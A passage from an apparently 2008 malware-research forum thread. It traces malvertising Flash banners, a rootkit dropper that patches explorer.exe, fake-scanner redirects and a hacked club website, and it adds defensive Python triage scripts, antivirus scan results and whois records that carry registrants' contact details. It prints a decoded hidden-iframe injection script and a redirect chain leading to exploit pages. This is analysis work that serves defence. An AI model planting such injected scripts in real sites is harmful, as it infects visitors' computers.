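        tags.append("swf-referer")            # the referring document is a banner
    return tags


def triage(raw):
    """Convenience wrapper: (host, path, tags) for one captured request."""
    req = parse_request(raw)
    return req["host"], req["path"], classify(req)


if __name__ == "__main__":
    for capture in (TODAYSTATS_REQUEST, BIGHIP_REQUEST):
        print(triage(capture))
```
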
Kimberly
<h4>
Served Ad - www.servedad.net
</h4>
A while back we saw that folder names in URLs can reveal interesting things, cf ReachWe. When I looked at the URL leading to the BigHip advertisement, I knew I already saw Servedad somewhere ...

BigHip.
imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/Servedad_LB_11137A/big_hip_01_728x90.swf
Link.

Forex AutoPilot.
image.ifrance.com/img/pub/servedad/forexautopilot_728x90.swf
Link.

Sandi did mention an advertisement for American Singles in June. I noticed the advertisement on 123greetings.com a couple of weeks ago but they were displaying the gif file and not the flash file. The link leading to the banner also carried the servedad mention and was hosted by RealMedia. Even by changing the link a little bit I was unable to discover the Flash version of this advertisement. Maybe it had been pulled already.

Served Ad - www.servedad.net

Don't bother clicking on the links, they don't work and all lead to the same page. If you have creatives from Served Ad, check them out at Adopstools. A warning about Served Ad being involved in malware is also displayed at Spam Laws.
IPB Image
Why am I not a bit surprised that www.servedad.net is registered by the infamous EstDomains ...

Website Title: Served Ad
Registry Data
ICANN Registrar: ESTDOMAINS, INC.
Created: 2007-06-24
Expires: 2009-06-24
Updated: 2008-06-23
Registrar Status: ok
Name Server: MANAGEDNS1.ESTBOXES.COM (has 7,769 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

Server Type: Apache/2.2.3 (CentOS)
IP Address: 216.195.62.78
IP Location - California - San Anselmo - Aps Telecom


Websites.
Kimberly
<h4>
Flash, rootkit & file system patching
</h4>
I can only wish one thing after you see this one: that you hate Flash and prevent it from running. That's about all I have to say on the whole Flash story.

It all starts again with one of those nifty small Flash files which contain a link to an executable. I will not focus on the swf file itself, we saw them enough lately.
IPB Image
IPB Image
First a small note: due to the complexity of the screenshots I had to run this bugger twice, so you will notice a difference in the driver name because it's random.

So what must happen, will happen ... x.exe is downloaded and executed on our system. It wants to install a driver/service (random name), starts an instance of Internet Explorer, writes into the memory address space of Internet Explorer, and x.exe is deleted.
IPB Image
That's only the tip of the iceberg because behind the scene there's much more going on.

Here we see x.exe dropping the driver into the root, the usual C:\
IPB Image
The driver is loaded into the System process.
IPB Image
The corresponding service is created.
CODE
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\11828ef8135c9f0a]
"Type"=dword:00000001
"Start"=dword:00000003
"ErrorControl"=dword:00000000
"ImagePath"=str(2):"\??\C:\11828ef8135c9f0a.dat"
"DisplayName"="11828ef8135c9f0a"
The driver is marked for deletion by x.exe and we will thus not be able to find C:\11828ef8135c9f0a.dat on our HDD.
IPB Image
Now take a seat as here comes the fun. I first didn't fully understand the meaning of everything seen in the picture below, but believe me, it will become crystal clear, especially after a reboot. We notice that x.exe messes around with explorer.exe and writes something directly to the HDD - Device\Harddisk\DR0 - at a certain offset. When we look at the size of the bytes written, we notice it's exactly the same size as explorer.exe.
IPB Image
IPB Image
In the meantime anything that hooks the SSDT will be kicked out ... antivirus, firewall, HIPS ... so you may say ciao to your protections. A hidden instance of Internet Explorer is started by x.exe and 2 unknown modules will appear in the memory address space of IE. A text file is then requested from a server which contains a list of files to download. The first file on the list is the dropper update.
IPB Image
At this stage our rootkit scan looks as follows.
QUOTE
GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-08-10 01:19:07
Windows 5.1.2600 Service Pack 2

---- Kernel code sections - GMER 1.0.14 ----

? C:\11828ef8135c9f0a.dat The system cannot find the file specified. !

---- User code sections - GMER 1.0.14 ----

.text C:\WINDOWS\Explorer.EXE[1252] Explorer.EXE 0101E260 4 Bytes [ E3, 38, FF, FF ]
.rsrc C:\WINDOWS\Explorer.EXE[1252] C:\WINDOWS\Explorer.EXE section is executable [0x01048000, 0xB2278, 0xE0000060]

---- EOF - GMER 1.0.14 ----
A strange thing happened when I fired up GMER: Windows found some new hardware and wanted to reboot.
IPB Image
I was curious how the rootkit scan would look afterwards, so I did reboot the computer. I found out that a chkdsk scan was scheduled at reboot, a scan I did cancel. When arriving on the desktop, Explorer.exe wanted Internet access ...
IPB Image
Uhmm, curious, as this usually does not happen. Guess what ... explorer.exe has been replaced; the Device\Harddisk\DR0 mystery is solved. The same list of files is downloaded again. Nothing prevents the bad guys from changing the list of files to download btw. The rootkit scan now looks like this:
QUOTE
GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-08-10 03:03:46
Windows 5.1.2600 Service Pack 2

---- User code sections - GMER 1.0.14 ----

.rsrc C:\WINDOWS\Explorer.EXE[1224] C:\WINDOWS\Explorer.EXE section is executable [0x01048000, 0xB2278, 0xE0000060]

---- EOF - GMER 1.0.14 ----
Still enjoying Flash?
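
The service entry and the two GMER scans from this post, run through the checks a defender would apply to them: flag the driver service, correlate it with the loaded-but-deleted kernel module, and show why the in-memory explorer.exe patch is only visible before the reboot. This is an added example, not code from the post; every input is copied from the text above and the heuristics are my own.

```python
"""Added example, not code from the forum post: triage checks for the host
artefacts this write-up shows (the dropped kernel-driver service and the GMER
scans before and after the reboot).  Every sample input is copied from the post;
the heuristics and their wording are my own."""
import re
# Service entry exactly as exported in the post (random hex name, .dat image).
SERVICE_REG = r'''[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\11828ef8135c9f0a]
"Type"=dword:00000001
"Start"=dword:00000003
"ErrorControl"=dword:00000000
"ImagePath"=str(2):"\??\C:\11828ef8135c9f0a.dat"
"DisplayName"="11828ef8135c9f0a"
'''

# GMER output from the post, taken before the reboot ...
GMER_BEFORE = r'''GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-08-10 01:19:07
Windows 5.1.2600 Service Pack 2

---- Kernel code sections - GMER 1.0.14 ----

? C:\11828ef8135c9f0a.dat The system cannot find the file specified. !

---- User code sections - GMER 1.0.14 ----

.text C:\WINDOWS\Explorer.EXE[1252] Explorer.EXE 0101E260 4 Bytes [ E3, 38, FF, FF ]
.rsrc C:\WINDOWS\Explorer.EXE[1252] C:\WINDOWS\Explorer.EXE section is executable [0x01048000, 0xB2278, 0xE0000060]

---- EOF - GMER 1.0.14 ----
'''
# ... and after it.  The .text entry is gone because memory now matches the
# patched explorer.exe on disk: from here on only a known-good hash tells them apart.
GMER_AFTER = r'''GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-08-10 03:03:46
Windows 5.1.2600 Service Pack 2

---- User code sections - GMER 1.0.14 ----

.rsrc C:\WINDOWS\Explorer.EXE[1224] C:\WINDOWS\Explorer.EXE section is executable [0x01048000, 0xB2278, 0xE0000060]

---- EOF - GMER 1.0.14 ----
'''

SERVICE_KEY_RE = re.compile(r'^\[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\([^\]]+)\]$', re.M)
VALUE_RE = re.compile(r'^"(\w+)"=(?:dword:([0-9a-fA-F]{8})|(?:str\(\d+\):)?"(.*)")$', re.M)
GMER_MISSING_RE = re.compile(r'^\?\s+(\S+)\s+The system cannot find the file specified', re.M)
GMER_USER_RE = re.compile(r'^(\.\w+)\s+(\S+?)\[(\d+)\]\s+(.*)$', re.M)
SERVICE_KERNEL_DRIVER = 1  # "Type" value of a kernel-mode driver service

def parse_service_reg(text):
    """Turn a .reg export of one Services\\<name> key into a dict (dwords as ints)."""
    m = SERVICE_KEY_RE.search(text)
    if not m:
        raise ValueError("no Services key in input")
    svc = {"name": m.group(1)}
    for value, dword, string in VALUE_RE.findall(text):
        svc[value] = int(dword, 16) if dword else string
    return svc

def image_path(svc):
    # Strip the \??\ NT object-manager prefix the post's ImagePath carries.
    image = svc.get("ImagePath", "")
    return image[4:] if image.startswith("\\??\\") else image

def driver_service_findings(svc):
    """Heuristics a defender can run over every Services\\* key on the box."""
    findings = []
    if svc.get("Type") == SERVICE_KERNEL_DRIVER:
        path = image_path(svc)
        # Legitimate drivers live under %SystemRoot%\system32\drivers as *.sys.
        if re.fullmatch(r'[A-Za-z]:\\[^\\]+', path):
            findings.append("kernel driver loaded from drive root: " + path)
        if not path.lower().endswith(".sys"):
            findings.append("kernel driver image is not a .sys file: " + path)
    if re.fullmatch(r'[0-9a-f]{16}', svc["name"]) and svc.get("DisplayName") == svc["name"]:
        findings.append("random hex service name reused as DisplayName")
    return findings

def gmer_missing_driver_images(log):
    """Loaded kernel modules whose file is gone (x.exe marked its driver for deletion)."""
    return GMER_MISSING_RE.findall(log)

def gmer_user_code_findings(log):
    """.text entries: code bytes in the running process differ from the image on disk."""
    parts = log.split("---- User code sections", 1)
    if len(parts) < 2:
        return []
    return [{"image": img, "pid": int(pid), "detail": detail}
            for sect, img, pid, detail in GMER_USER_RE.findall(parts[1]) if sect == ".text"]

def service_image_is_missing(svc, log):
    """Correlate the service's ImagePath with GMER's missing-file kernel entry."""
    return image_path(svc).lower() in [p.lower() for p in gmer_missing_driver_images(log)]

if __name__ == "__main__":
    svc = parse_service_reg(SERVICE_REG)
    print(driver_service_findings(svc))
    print("driver file missing:", service_image_is_missing(svc, GMER_BEFORE))
    print("patched in memory before reboot:", gmer_user_code_findings(GMER_BEFORE))
    print("patched in memory after reboot: ", gmer_user_code_findings(GMER_AFTER))
```
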

<h4>
Virustotal
</h4>
Filename: i115.swf

File size: 1398 bytes
MD5...: 480deb1e22065768cacc31969520afdd
SHA1..: 1f3297f1360ea9e8694e1d42a8262e3fde493808
PEiD..: -
packers (Kaspersky): Swf2Swc
QUOTE
File i115.swf received on 08.09.2008 23:20:18 (CET)
AhnLab-V3 2008.8.9.0 2008.08.08 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.19 2008.08.09 EXP/Flash.Gen
Authentium 5.1.0.4 2008.08.09 -
Avast 4.8.1195.0 2008.08.09 SWF:CVE-2007-0071
AVG 8.0.0.156 2008.08.09 -
BitDefender 7.2 2008.08.09 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.08.08 SWF.Exploit
ClamAV 0.93.1 2008.08.09 -
DrWeb 4.44.0.09170 2008.08.09 Exploit.SWF.73
eSafe 7.0.17.0 2008.08.07 -
eTrust-Vet 31.6.6019 2008.08.08 -
Ewido 4.0 2008.08.09 -
F-Prot 4.4.4.56 2008.08.08 -
F-Secure 7.60.13501.0 2008.08.09 -
Fortinet 3.14.0.0 2008.08.09 -
GData 2.0.7306.1023 2008.08.09 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.08.09 -
K7AntiVirus 7.10.408 2008.08.09 -
Kaspersky 7.0.0.125 2008.08.09 -
McAfee 5357 2008.08.08 -
Microsoft 1.3807 2008.08.09 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3342 2008.08.09 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.08.08 -
Panda 9.0.0.4 2008.08.09 -
PCTools 4.4.2.0 2008.08.09 -
Prevx1 V2 2008.08.09 -
Rising 20.56.41.00 2008.08.08 -
Sophos 4.32.0 2008.08.09 Exp/SWFScene-A
Sunbelt 3.1.1538.1 2008.08.09 -
Symantec 10 2008.08.09 Bloodhound.Exploit.193
TheHacker 6.2.96.395 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.08 -
VBA32 3.12.8.3 2008.08.09 -
ViRobot 2008.8.8.1329 2008.08.08 -
VirusBuster 4.5.11.0 2008.08.09 -
Webwasher-Gateway 6.6.2 2008.08.09 Exploit.Flash.Gen
______________________________

Filename: x.exe

File size: 15360 bytes
MD5...: e2331372153e16ab9bb75b558d9b3cef
SHA1..: 5ffe8c1982ad49af5cc8a3e1e1dc8a2f8ff17f46
SHA256: 477d403e314b96ddeb8a62530b3dd03c34693ac63ba198e24a38bd7dd2b1db36
PEiD..: UPX 2.90 [LZMA]
QUOTE
File x.exe received on 08.10.2008 03:09:40 (CET)
AhnLab-V3 2008.8.9.0 2008.08.08 -
AntiVir 7.8.1.19 2008.08.09 TR/Spy.Gen
Authentium 5.1.0.4 2008.08.10 W32/Heuristic-KPP!Eldorado
Avast 4.8.1195.0 2008.08.09 Win32:Spyware-gen
AVG 8.0.0.156 2008.08.09 Injector.R
BitDefender 7.2 2008.08.10 -
CAT-QuickHeal 9.50 2008.08.08 -
ClamAV 0.93.1 2008.08.09 -
DrWeb 4.44.0.09170 2008.08.09 Trojan.Inject.origin
eSafe 7.0.17.0 2008.08.07 Suspicious File
eTrust-Vet 31.6.6021 2008.08.08 -
Ewido 4.0 2008.08.09 -
F-Prot 4.4.4.56 2008.08.10 W32/Heuristic-KPP!Eldorado
F-Secure 7.60.13501.0 2008.08.09 -
Fortinet 3.14.0.0 2008.08.09 W32/BIW!tr.dldr
GData 2.0.7306.1023 2008.08.10 Win32:Spyware-gen
Ikarus T3.1.1.34.0 2008.08.10 Virus.Win32.Spyware
K7AntiVirus 7.10.408 2008.08.09 -
Kaspersky 7.0.0.125 2008.08.10 -
McAfee 5357 2008.08.08 Downloader-BIW
Microsoft 1.3807 2008.08.09 -
NOD32v2 3342 2008.08.09 a variant of Win32/Inject.NBE
Norman 5.80.02 2008.08.08 W32/DLoader.IUIC
Panda 9.0.0.4 2008.08.09 Generic Malware
PCTools 4.4.2.0 2008.08.09 -
Prevx1 V2 2008.08.10 -
Rising 20.56.41.00 2008.08.08 -
Sophos 4.32.0 2008.08.10 Mal/Heuri-D
Sunbelt 3.1.1538.1 2008.08.09 RiskTool.Win32.ProcessPatcher.Sml!cobra (v)
Symantec 10 2008.08.10 Trojan Horse
TheHacker 6.2.96.395 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.08 PAK_Generic.001
VBA32 3.12.8.3 2008.08.09 -
ViRobot 2008.8.8.1329 2008.08.08 -
VirusBuster 4.5.11.0 2008.08.09 -
Webwasher-Gateway 6.6.2 2008.08.09 Trojan.Spy.Gen
______________________________

Filename: 9bf4f690dc4ecb2b.dat

File size: 5664 bytes
MD5...: 11bdfd641ccef3d04c893da95488ac2f
SHA1..: a3644956e6f5488bf7804ea8c88650d7d52f02cf
SHA256: 0eb647518e4767074f9f730eab196c6f842d09bd9a461128bd26eceb7606f7e3
PEiD..: -
QUOTE
File 9bf4f690dc4ecb2b.dat received on 08.09.2008 23:06:48 (CET)
AhnLab-V3 2008.8.9.0 2008.08.08 -
AntiVir 7.8.1.19 2008.08.09 -
Authentium 5.1.0.4 2008.08.09 -
Avast 4.8.1195.0 2008.08.09 -
AVG 8.0.0.156 2008.08.09 -
BitDefender 7.2 2008.08.09 -
CAT-QuickHeal 9.50 2008.08.08 -
ClamAV 0.93.1 2008.08.09 -
DrWeb 4.44.0.09170 2008.08.09 -
eSafe 7.0.17.0 2008.08.07 -
eTrust-Vet 31.6.6021 2008.08.08 -
Ewido 4.0 2008.08.09 -
F-Prot 4.4.4.56 2008.08.08 -
F-Secure 7.60.13501.0 2008.08.09 -
Fortinet 3.14.0.0 2008.08.09 -
GData 2.0.7306.1023 2008.08.09 -
Ikarus T3.1.1.34.0 2008.08.09 -
K7AntiVirus 7.10.408 2008.08.09 -
Kaspersky 7.0.0.125 2008.08.09 -
McAfee 5357 2008.08.08 -
Microsoft 1.3807 2008.08.09 VirTool:WinNT/Rootkitdrv.AQ
NOD32v2 3342 2008.08.09 -
Norman 5.80.02 2008.08.08 -
Panda 9.0.0.4 2008.08.09 -
PCTools 4.4.2.0 2008.08.09 -
Prevx1 V2 2008.08.09 -
Rising 20.56.41.00 2008.08.08 -
Sophos 4.32.0 2008.08.09 -
Sunbelt 3.1.1538.1 2008.08.09 -
Symantec 10 2008.08.09 -
TheHacker 6.2.96.395 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.08 -
VBA32 3.12.8.3 2008.08.09 -
ViRobot 2008.8.8.1329 2008.08.08 -
VirusBuster 4.5.11.0 2008.08.09 -
Webwasher-Gateway 6.6.2 2008.08.09 -
______________________________

Filename: explorer.exe

File size: 1032192 bytes
MD5...: 925b0209b90b9c7fbf76f4d11c1e1316
SHA1..: 6b19f040213cd1b68d1b26858c2c385eb2788592
SHA256: ea5f720c18d244eec3a7ea5acbd034accb00e6cbdddad7486421553e79204241
PEiD..: -
QUOTE
File explorer.exe received on 08.10.2008 01:55:39
AhnLab-V3 2008.8.9.0 2008.08.08 -
AntiVir 7.8.1.19 2008.08.09 -
Authentium 5.1.0.4 2008.08.09 -
Avast 4.8.1195.0 2008.08.09 -
AVG 8.0.0.156 2008.08.09 -
BitDefender 7.2 2008.08.10 -
CAT-QuickHeal 9.50 2008.08.08 -
ClamAV 0.93.1 2008.08.09 -
DrWeb 4.44.0.09170 2008.08.09 -
eSafe 7.0.17.0 2008.08.07 -
eTrust-Vet 31.6.6021 2008.08.08 -
Ewido 4.0 2008.08.09 -
F-Prot 4.4.4.56 2008.08.08 -
F-Secure 7.60.13501.0 2008.08.09 -
Fortinet 3.14.0.0 2008.08.09 -
GData 2.0.7306.1023 2008.08.10 -
Ikarus T3.1.1.34.0 2008.08.10 Trojan.Win32.VB.avg
K7AntiVirus 7.10.408 2008.08.09 -
Kaspersky 7.0.0.125 2008.08.10 -
McAfee 5357 2008.08.08 W32/ExpPatch
Microsoft 1.3807 2008.08.09 -
NOD32v2 3342 2008.08.09 -
Norman 5.80.02 2008.08.08 -
Panda 9.0.0.4 2008.08.09 -
PCTools 4.4.2.0 2008.08.09 -
Prevx1 V2 2008.08.10 -
Rising 20.56.41.00 2008.08.08 -
Sophos 4.32.0 2008.08.09 -
Sunbelt 3.1.1538.1 2008.08.09 -
Symantec 10 2008.08.10 -
TheHacker 6.2.96.395 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.08 -
VBA32 3.12.8.3 2008.08.09 -
ViRobot 2008.8.8.1329 2008.08.08 -
VirusBuster 4.5.11.0 2008.08.09 -
Webwasher-Gateway 6.6.2 2008.08.09 Win32.Malware.gen (suspicious)
I haven't scanned the downloaded files yet. I'll try to post some information about them later on.
Kimberly
Some additional details about x.exe can be found in this writeup from Symantec.

Scan of the downloaded files.
--------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER 7 REPORT
Sunday, August 10, 2008
Operating System: Microsoft Windows XP Professional Service Pack 2 (build 2600)
Kaspersky Online Scanner 7 version: 7.0.25.0
Program database last update: Sunday, August 10, 2008 17:06:19
Records in database: 1079166
--------------------------------------------------------------------------------

Scan settings:
Scan using the following database: extended
Scan archives: yes
Scan mail databases: yes

Scan area - Folder:
C:\Files

Scan statistics:
Files scanned: 31
Threat name: 26
Infected objects: 29
Suspicious objects: 0
Duration of the scan: 00:00:05

File name / Threat name
C:\Files\7.exe Infected: Trojan-Downloader.Win32.Aqtemp.an
C:\Files\8.exe Infected: Trojan.Win32.Agent.ybf
C:\Files\9.exe Infected: Trojan-GameThief.Win32.WOW.bqs
C:\Files\a.exe Infected: Virus.Win32.Parite.b
C:\Files\a1.exe Infected: Trojan-GameThief.Win32.OnLineGames.spgw
C:\Files\a10.exe Infected: Trojan-GameThief.Win32.OnLineGames.snrt
C:\Files\a11.exe Infected: Trojan-GameThief.Win32.OnLineGames.spdu
C:\Files\a12.exe Infected: Trojan-GameThief.Win32.OnLineGames.spix
C:\Files\a13.exe Infected: Trojan-GameThief.Win32.OnLineGames.sood
C:\Files\a14.exe Infected: Trojan-GameThief.Win32.OnLineGames.spgw
C:\Files\a15.exe Infected: Trojan-GameThief.Win32.OnLineGames.snse
C:\Files\a16.exe Infected: Trojan-GameThief.Win32.OnLineGames.spgy
C:\Files\a17.exe Infected: Trojan-GameThief.Win32.OnLineGames.soof
C:\Files\a18.exe Infected: Trojan-GameThief.Win32.OnLineGames.sotx
C:\Files\a19.exe Infected: Trojan-GameThief.Win32.OnLineGames.spgx
C:\Files\a2.exe Infected: Trojan-GameThief.Win32.OnLineGames.bkln
C:\Files\a20.exe Infected: Trojan-PSW.Win32.Agent.nr
C:\Files\a21.exe Infected: Trojan-GameThief.Win32.OnLineGames.snsi
C:\Files\a22.exe Infected: Trojan-GameThief.Win32.OnLineGames.sjcq
C:\Files\a23.exe Infected: Trojan-GameThief.Win32.OnLineGames.snsj
C:\Files\a25.exe Infected: Trojan-GameThief.Win32.OnLineGames.shhw
C:\Files\a3.exe Infected: Trojan-GameThief.Win32.OnLineGames.shhv
C:\Files\a4.exe Infected: Trojan-GameThief.Win32.OnLineGames.spgw
C:\Files\a5.exe Infected: Trojan-GameThief.Win32.OnLineGames.snsa
C:\Files\a6.exe Infected: Trojan-GameThief.Win32.OnLineGames.sndp
C:\Files\a7.exe Infected: Trojan-GameThief.Win32.OnLineGames.sooh
C:\Files\a9.exe Infected: Trojan-GameThief.Win32.OnLineGames.sjcq
C:\Files\c2.exe Infected: not-a-virus:AdWare.Win32.BHO.bqt
C:\Files\c3.exe Infected: not-a-virus:AdWare.Win32.Cinmus.pba
Missing files scanned at Virustotal - Kaspersky Results.
C:\Files\a8.exe - Trojan-GameThief.Win32.OnLineGames.spdn
C:\Files\a24.exe - Trojan-GameThief.Win32.OnLineGames.snnd
Short description of the most dangerous.
Virus.Win32.Parite.b searches for Win32 PE EXE files with .scr and .exe extensions on all logical drives of the computer, and also in shared resources on the local network, and infects them.

Trojan-GameThief.Win32.OnLineGames is a threat that attempts to steal vital information from the user with regard to online gaming activity and is capable of connecting to a remote site to download possible updates of its application.
Can I protect myself from these adverts?

<h4>
bestpictures2.com
</h4>
adtds.trackads.net / adtds2.promoplexer.com have activated a new domain: bestpictures2.com
bestpictures2.com/soft.php?aid=0593&d=3&product=XPA
Depending on the parameters, people will get redirected to different fake online scanners. I got redirected to
windows-scanner.com/2009/1/freescan.php?aid=880593
bestpictures2.com - 84.16.227.62

Website Title: None given.
ICANN Registrar: BIZCN.COM, INC.
Created: 2008-07-30
Expires: 2009-07-30
Updated: 2008-07-31
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 825 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.bizcn.com

IP Location - Berlin - Berlin - Netdirekt E.k
Dedicated Hosting: bestpictures2.com is hosted on a dedicated server.

Whois Record
Domain name: bestpictures2.com

Registrant Contact:
DomainsReg, Inc.
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Administrative Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Technical Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn

Billing Contact:
Sergey Astakhov
1-800-716-0023 fax: 1-800-716-0023
Lenin str. 38, 77
Saratov Saratovskaya oblast 150040
cn
______________________________

windows-scanner.com - 84.16.227.62

Website Title: Antivirus 2009 - Official website
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-01
Expires: 2009-07-01
Updated: 2008-07-01
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 825 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

Server Type: lighttpd
IP Location - Berlin - Berlin - Netdirekt E.k
Dedicated Hosting: windows-scanner.com is hosted on a dedicated server.

Whois Record
Domain Name: WINDOWS-SCANNER.COM

Creation Date: 01-Jul-2008
Expiration Date: 01-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
N/A
Victor Temchenko ()
Baterman 58 -136
London
London,W3Z 1AC
GB
Tel. +38.0638550739

Administrative Contact:
N/A
Victor Temchenko ()
Baterman 58 -136
London
London,W3Z 1AC
GB
Tel. +38.0638550739

Technical Contact:
N/A
Victor Temchenko ()
Baterman 58 -136
London
London,W3Z 1AC
GB
Tel. +38.0638550739

Billing Contact:
N/A
Victor Temchenko ()
Baterman 58 -136
London
London,W3Z 1AC
GB
Tel. +38.0638550739
Kimberly
<h4>
www.rebondottignies.be - Nancy Drew
</h4>
WawaSeb alerted me to this case. A women's basketball club website - www.rebondottignies.be - has been kind of hijacked by our Nancy Drew malvertizement. I did mention her "Hijacking In Style" a couple of days ago.

So what do we have here? A nifty script on the homepage ... the owner of the site has been a victim of hacking.
IPB Image
Decoded:
CODE
<script Language='Javascript'>document.write(unescape
('<iframe src="http://PLJ.dAgOTh.iN/" width=0 height=0></iframe>'));</script>
Let's follow the moves ...
CODE
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.rebondottignies.be/
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: plj.dagoth.in
Connection: Keep-Alive

HTTP/1.1 302 Redirect
Content-Length: 165
Content-Type: text/html
Location: http://mn96.dns.gendistr.info/qualitytest/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 11 Aug 2008 19:01:29 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://mn96.dns.gendistr.info/qualitytest/">here</a></body>

CODE
GET /qualitytest/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.rebondottignies.be/
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Host: mn96.dns.gendistr.info

HTTP/1.1 302 Found
Date: Mon, 11 Aug 2008 19:00:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Location: http://td.weblode.biz/ts/in.cgi?eadle
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

CODE
GET /ts/in.cgi?eadle HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.rebondottignies.be/
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Host: td.weblode.biz

HTTP/1.1 302 Found
Date: Mon, 11 Aug 2008 19:07:29 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.7e-p1 DAV/2
Location: http://td.weblode.biz/tds/in.cgi?3&group=1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://td.weblode.biz/tds/in.cgi?3&group=1'">
</head>
<body>
document moved <a href="http://td.weblode.biz/tds/in.cgi?3&group=1">here</a>
</body>
</html>

CODE
GET /tds/in.cgi?3&group=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.rebondottignies.be/
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Cookie: SL_eadle_0000=_1_; TSUSER=eadle
Connection: Keep-Alive
Host: td.weblode.biz

HTTP/1.1 302 Found
Date: Mon, 11 Aug 2008 19:07:29 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.7e-p1 DAV/2
Location: http://dergamend.com/roy/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://dergamend.com/roy/'">
</head>
<body>
document moved <a href="http://dergamend.com/roy/">here</a>
</body>
</html>
Whoops, here we have an obfuscated script to decode.
IPB Image
It's a very long script. OS, browser and Flash version are tested and some exploits get fired up.
  • MS06-014
  • MS03-011
  • MS05-001
  • Flash
Below is a snippet of the decoded script relating to the Flash content, of course.
IPB Image
Malicious SWF file.
IPB Image
Payload.
IPB Image
Filename: Tempmbroit.exe

File size: 129536 bytes
MD5...: 695875f95fbf46cd014c8d1c05faa236
SHA1..: 882c20b5968651158b510a1ab844a91ca62bff30
SHA256: 0dceaacb4af818a2108d13862b191f3eb203d09261f29aabdc7259a90d18d1c4
PEiD..: -
QUOTE
File Tempmbroit.exe received on 08.12.2008 02:14:17 (CET)
AhnLab-V3 2008.8.12.0 2008.08.11 -
AntiVir 7.8.1.19 2008.08.11 TR/Dldr.Small.aatc
Authentium 5.1.0.4 2008.08.12 -
Avast 4.8.1195.0 2008.08.11 -
AVG 8.0.0.156 2008.08.11 -
BitDefender 7.2 2008.08.12 -
CAT-QuickHeal 9.50 2008.08.11 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.12 -
DrWeb 4.44.0.09170 2008.08.11 -
eSafe 7.0.17.0 2008.08.11 Suspicious File
eTrust-Vet 31.6.6021 2008.08.08 -
Ewido 4.0 2008.08.11 -
F-Prot 4.4.4.56 2008.08.11 -
F-Secure 7.60.13501.0 2008.08.12 Trojan-Downloader.Win32.Small.aatc
Fortinet 3.14.0.0 2008.08.11 -
GData 2.0.7306.1023 2008.08.12 Trojan-Downloader.Win32.Small.aatc
